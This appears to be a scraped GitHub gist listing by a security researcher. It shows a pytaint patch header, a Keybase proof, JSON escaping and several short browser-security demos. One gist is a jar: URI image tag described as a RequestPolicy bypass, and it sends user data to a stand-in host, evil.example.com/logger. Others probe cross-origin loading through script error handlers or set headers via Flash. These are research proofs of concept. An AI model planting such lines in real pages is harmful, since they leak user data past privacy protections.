Skip to content

Instantly share code, notes, and snippets.

Avatar

Jordan Milne JordanMilne

  • Canada
View GitHub Profile
@JordanMilne
JordanMilne / pytaint.patch
Created Oct 21, 2014
pyenv-compatible patch for pytaint against python 2.7.5, see https://github.com/felixgr/pytaint
View pytaint.patch
From 2aea5633663dd0b91d55a80a17ad22edfb23731f Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Felix=20Gr=C3=B6bert?= <groebert@google.com>
Date: Mon, 7 Oct 2013 15:44:48 +0200
Subject: [PATCH 1/9] pytaint patch
---
Include/Python.h | 3 +
Include/meritobject.h | 28 +
Include/pyerrors.h | 1 +
Include/stringobject.h | 53 +-
View keybase.md

Keybase proof

I hereby claim:

  • I am jordanmilne on github.
  • I am largenocream (https://keybase.io/largenocream) on keybase.
  • I have a public key whose fingerprint is D39D AEC8 56F2 2C2B A0ED BFC6 BADF 89BE FF6F 9ED3

To claim this, I am signing this object:

View gist:e9c6314d56e7f2fc649a
LF
$ ./stmd --ast foo.md
document
paragraph
str "Normal paragraph"
paragraph
str "Paragraph 2"
paragraph
str "foo "
@JordanMilne
JordanMilne / gist:0880a229356b317f9ee0
Created Jul 7, 2014
JSON_HEX_TAGS-like functionality
View gist:0880a229356b317f9ee0
>>> import simplejson
>>> print simplejson.dumps({"foo<>":"<>bar&"}, cls=simplejson.JSONEncoderForHTML)
{"foo\u003c\u003e": "\u003c\u003ebar\u0026"}
@JordanMilne
JordanMilne / content-type.mxml
Created Jan 16, 2014
setting the Content-Type header with flash
View content-type.mxml
<?xml version="1.0"?>
<s:Application xmlns:fx="http://ns.adobe.com/mxml/2009" xmlns:mx="library://ns.adobe.com/flex/mx" xmlns:s="library://ns.adobe.com/flex/spark" >
<fx:Script><![CDATA[
import flash.net.*;
public function sendStuff():void
{
var r:URLRequest = new URLRequest('http://www.youtube.com/foo');
r.method = 'POST';
r.data = '{wow what a great post body}';
View gist:8032399
<script src="http://google.com" onload="javascript:alert('google loaded')" onerror="javascript:alert('google failed')"></script>
@JordanMilne
JordanMilne / gist:7704136
Created Nov 29, 2013
Demonstration of a RequestPolicy bypass using jar: URIs
View gist:7704136
<img src="jar:http://evil.example.com/logger?userdata=whatever!/foobar" />
@JordanMilne
JordanMilne / gist:6459317
Created Sep 6, 2013
Demonstrates abuse of script error handling
View gist:6459317
<html>
<body>
<script src="http://google.com" onload="javascript:alert('google loaded')" onerror="javascript:alert('google failed')"></script>
<script src="http://doesntexist.example.com" onload="javascript:alert('universe exploded')" onerror="javascript:alert('doesntexist failed to load as expected')"></script>
</body>
</html>
You can’t perform that action at this time.